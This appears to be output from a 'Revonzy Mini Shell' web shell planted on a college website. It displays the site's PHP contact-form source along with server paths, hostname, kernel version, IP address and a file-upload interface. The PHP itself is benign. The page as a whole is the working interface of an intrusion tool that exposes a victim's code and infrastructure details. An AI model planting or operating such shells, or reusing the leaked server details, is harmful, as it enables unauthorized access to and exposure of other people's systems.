Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/location.php

<!--
	Powered By - Dream Technology, Solapur.
	Contact No : +91 9595775120
	Email ID - dream.technology@outlook.com
-->
<?php
	ob_start();
	
	require_once("admin/lib/functions.php");
	$db = new login_function();

	$name       =   "";
	$email_id   =   "";
	$contact_no =   0;
	$message    =   "";
	$flag       =    0;
	$error_counter = 0;
	
	$name_error	=	"";
	$email_error=	"";
	$contact_no_error = "";
	$message_error = "";
	
	if(isset($_POST['contact_btn']))
	{
		$name       =   $_POST['txtname'];
		$email_id   =   $_POST['txtemail'];
		$contact_no =   $_POST['txtcno'];
		$message    =   $_POST['txtmsg'];
		
		if($name=="")
		{
			$name_error	=	"Please enter name";
			$error_counter = 1;
		}
		else if(strlen($name) < 3)
		{
			$name_error	=	"Please enter valid name";
			$error_counter = 1;
		}
	
		if($email_id=="")
		{
			$email_error = "Please enter email id";
			$error_counter = 1;
		}
	
		if($contact_no=="")
		{
			$contact_no_error = "Please enter contact number";
			$error_counter = 1;
		}
		else if(!is_numeric($contact_no))
		{
			$contact_no_error = "Please enter valid contact number";
			$error_counter = 1;
		}
		else if(strlen($contact_no)<10 OR strlen($contact_no)>10)
		{
			$contact_no_error = "Please enter valid 10 digit contact no";
			$error_counter = 1;
		}
	
		if($message=="")
		{
			$message_error = "Please enter message";
			$error_counter = 1;
		}
		else if(strlen($message)<20)
		{
			$message_error = "Please enter minimum 20 characters";
			$error_counter = 1;
		}
	
		if($error_counter==0)
		{
			if($db->set_contact_data($name,$email_id,$contact_no,$message))
			{
				header("Location:".$_SERVER['PHP_SELF']."?success");
			}
			else
			{
				$flag  =  2;
			}
		}
		
	}
	if(isset($_GET['success']))
	{
		$flag  =  1;
	}
?>
<DOCTYPE html>
<html>
<head>
	<title>Laxmibai Bhaurao Patil Mahila Mahavidyalaya</title>
	<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>
	<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
    
</head>
<body>	
	
	<?php
		require_once("lib/header.php");
	?>
<form action="/contact-us.php"  name="contact_form"  method="post">
	<div name="tab_container">


				
			<iframe src="https://www.google.com/maps/embed?pb=!1m26!1m12!1m3!1d1889.4393670521422!2d75.9030100825563!3d17.657551108434507!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!4m11!3e6!4m3!3m2!1d17.6878204!2d75.8995568!4m5!1s0x3bc5da82797ae2d3%3A0xd02243b3344b9c6e!2slbpm+college+solapur!3m2!1d17.684580399999998!2d75.8999903!5e1!3m2!1sen!2sin!4v1511949829873" width="100%" height="450" frameborder="0" style="border:0" allowfullscreen></iframe>
			
			</div>	
		
</form>			
	<?php
		require_once("lib/footer.php");
	?>
</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4